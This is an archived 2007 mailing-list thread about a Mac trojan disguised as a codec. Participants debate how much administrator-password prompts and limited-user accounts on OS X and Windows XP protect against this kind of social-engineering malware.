To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Comparing apples and oranges. If you want an equivalent Tiger and XP setup you have to run as a limited user in XP. If it is not obvious, SE type malware also requires Administrator privileges in XP. On 11/1/07, Hanz Makmur [EMAIL PROTECTED] wrote: Yap. Social Engineering type of program is hard to deal with. I dont see this as big as the subject would like it to be. mac trojan in-the-wild. 'Wild' imho means out of control. SE program requires many clicks. To tame it even more, by default, on the mac, unlike windows, one needs to enter administrator password to activate this type of program. Hidden network activities are also tame even more in Leopard.(v.10.5) Hanz On Oct 31, 2007, at 10:09 PM, Eduardo Tongson wrote: This is an SE type of malware. Codecs require installation so it needs root/admin privileges. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Then you have an OS X setup that is equivalent to a default XP setup where the user is running as Computer Administrator. Trojan slips through happily. On 11/1/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- but what if a user configured osx so that the administrator password does not need to be entered each time? Gadi Evron mailto:[EMAIL PROTECTED] wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Wed, 31 Oct 2007, Hanz Makmur wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Yap. Social Engineering type of program is hard to deal with. I dont see this as big as the subject would like it to be. mac trojan in-the-wild. 'Wild' imho means out of control. SE program requires many clicks. To tame it even more, by default, on the mac, unlike windows, one needs to enter administrator password to activate this type of program. Hidden network activities are also tame even more in Leopard.(v.10.5) in-the-wild in this context means what it means for years now in our realm: Currently actively exploited. Hanz On Oct 31, 2007, at 10:09 PM, Eduardo Tongson wrote: This is an SE type of malware. Codecs require installation so it needs root/admin privileges. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
